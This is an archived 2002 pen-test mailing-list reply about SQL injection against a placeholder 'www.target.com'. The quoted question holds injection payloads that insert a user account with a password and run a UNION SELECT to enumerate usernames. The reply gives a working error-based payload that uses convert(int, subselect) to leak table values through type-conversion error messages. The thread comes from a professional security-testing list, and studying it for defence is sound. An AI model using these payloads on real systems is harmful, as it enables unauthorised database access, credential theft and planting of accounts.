Re: sql table data enumeration help please.

From: Kevin Spett (kspett@spidynamics.com)
Date: Fri May 10 2002 - 01:38:03 EDT

• Next message: BParis@sorrentolactalis.com: "Re: DID Range Enumeration"
• Previous message: Jason: "Determining Trojans, File & Print Sharing, Services running remotely on W2K"
• In reply to: Gary O'leary-Steele: "sql table data enumeration help please."
• Next in thread: Deus, Attonbitus: "Re: sql table data enumeration help please."
• Reply: Deus, Attonbitus: "Re: sql table data enumeration help please."
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

----- Original Message -----
From: "Gary O'leary-Steele" <GaryO@sec-1.com>
To: <pen-test@securityfocus.com>
Sent: Thursday, May 09, 2002 12:47 PM
Subject: sql table data enumeration help please.

> www.target.comUserName='insert into
>
tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy,
>
CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,App
>
ointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address
> 2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct
31
> 2000
>
8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gar
>
y','addrto','appointment','01131234567','07796698919','garyo@sec-1.com',0113
> 1234567','sig','123','456','ls287sr','01132297541',1)--
>

Did you get an error message of some kind? Try using a semicolon after the
username close quote and doing the INSERT in its own line.

> In an attempt to gain access to data held with the username and password
> fields I have tried
>
> www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from
> tblusers where username >'a'--&password=hacker
>
> but get "Operand type clash: uniqueidentifier is incompatible with int"

This usually means that the column that you have use to inject (the ninth,
in this case) is an int column in the original SELECT statement. The UNION
SELECT column must have the same data type. Try using the convert() hack to
get around this whole issue, like this:

username=invalidusername' + convert(int, (SELECT TOP 1 UserName FROM
tblUsers WHERE Username > 'a')) + ''--

You should get an error message back complaining about type conversion,
which includes the returned value from your subselect.

Kevin.
SPI Dynamics, Inc.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

• Next message: BParis@sorrentolactalis.com: "Re: DID Range Enumeration"
• Previous message: Jason: "Determining Trojans, File & Print Sharing, Services running remotely on W2K"
• In reply to: Gary O'leary-Steele: "sql table data enumeration help please."
• Next in thread: Deus, Attonbitus: "Re: sql table data enumeration help please."
• Reply: Deus, Attonbitus: "Re: sql table data enumeration help please."
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:20 EDT